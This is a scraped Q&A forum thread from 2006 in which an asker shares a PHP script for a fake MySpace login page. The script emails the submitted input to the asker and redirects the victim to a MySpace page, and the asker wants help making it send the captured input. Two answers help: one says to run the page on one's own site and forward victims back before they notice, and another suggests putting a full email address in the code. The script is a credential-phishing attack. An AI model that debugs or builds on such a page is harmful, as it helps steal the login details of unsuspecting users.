English Deutsch Français Italiano Español Português 繁體中文 Bahasa Indonesia Tiếng Việt ภาษาไทย
All categories

i have been trying to make a fake login and everything is good except that is does not email me wut they type in. so here is the code i wrote and tell me wut is wrong

$email = $_REQUEST['email'] ;
$message = $_REQUEST['message'] ;

mail( "hiyohi55", "Feedback Form Results",
$message, "From: $email" );
header( "Location: http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewPicture&friendID=18595918" );
?>

2006-12-18 15:40:29 · 3 answers · asked by Anonymous in Computers & Internet Programming & Design

3 answers

well.. lets make this simple. myspace will strip any php code they see, so it will not execute.

If you are trying to do this it would need to be run on your own site, and have them forwarded back to myspace before they notice.

Also what you are asking to do is wrong and immoral and probably violates the terms of service of yahoo answers.

2006-12-18 16:01:03 · answer #1 · answered by Bradford K 4 · 0 0

You need to include your full email address in your code.

I also don't know if myspace allows sending email like this.

2006-12-18 15:47:20 · answer #2 · answered by Bryan A 5 · 0 0

probably your host has disabled the Hypertext Preprocessor mail() function because of undesirable scripts which includes this, which do not verify for injection or termination attacks. that's fantastically in all probability if you're utilizing a loose host.

2016-11-30 22:54:30 · answer #3 · answered by Anonymous · 0 0

fedest.com, questions and answers